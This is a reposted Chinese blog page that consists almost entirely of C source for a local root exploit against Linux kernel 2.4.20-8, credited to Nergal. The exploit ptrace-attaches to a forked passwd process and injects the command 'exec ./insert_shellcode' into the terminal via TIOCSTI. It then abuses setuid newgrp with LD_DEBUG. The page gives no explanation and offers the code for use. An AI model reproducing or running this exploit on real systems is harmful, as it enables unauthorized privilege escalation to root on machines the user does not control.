Linux l 2.4.20-8 # 溢出

代码如下:

/* by Nergal */
#include <stdio.h>
#include <sys/ptrace.h>
#include <fcntl.h>
#include <sys/ioctl.h>
void ex_passwd(int fd)
{
 char z;
 if (read(fd, &z, 1) <= 0) {
  perror("read:");
  exit(1);
 }
 execl("/usr/bin/passwd", "passwd", 0);
 perror("execl");
 exit(1);
}
void insert(int pid)
{
 char buf[100];
 char *ptr = buf;
 sprintf(buf, "exec ./insert_shellcode %i\n", pid);
 while (*ptr && !ioctl(0, TIOCSTI, ptr++));
}


main(int argc, char **argv)
{
 int res, fifo;
 int status;
 int pid, n;
 int pipa[2];
 char buf[1024];
 pipe(pipa);
 switch (pid = fork()) {
 case -1:
  perror("fork");
  exit(1);
 case 0:
  close(pipa[1]);
  ex_passwd(pipa[0]);
 default:;
 }

 res = ptrace(PTRACE_ATTACH, pid, 0, 0);
 if (res) {
  perror("attach");
  exit(1);
 }
 res = waitpid(-1, &status, 0);
 if (res == -1) {
  perror("waitpid");
  exit(1);
 }
 res = ptrace(PTRACE_CONT, pid, 0, 0);
 if (res) {
  perror("cont");
  exit(1);
 }
 fprintf(stderr, "attached\n");
 switch (fork()) {
 case -1:
  perror("fork");
  exit(1);
 case 0:
  close(pipa[1]);
  sleep(1);
  insert(pid);
  do {
   n = read(pipa[0], buf, sizeof(buf));
  } while (n > 0);
  if (n < 0)
   perror("read");
  exit(0);
 default:;
 }
 close(pipa[0]);
 dup2(pipa[1], 2);
 close(pipa[1]);
 /* Decrystallizing reason */
 setenv("LD_DEBUG", "libs", 1);
 /* With strength I burn */
 execl("/usr/bin/newgrp", "newgrp", 0);

转载于:https://www.cnblogs.com/baogg/archive/2011/05/02/2034170.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值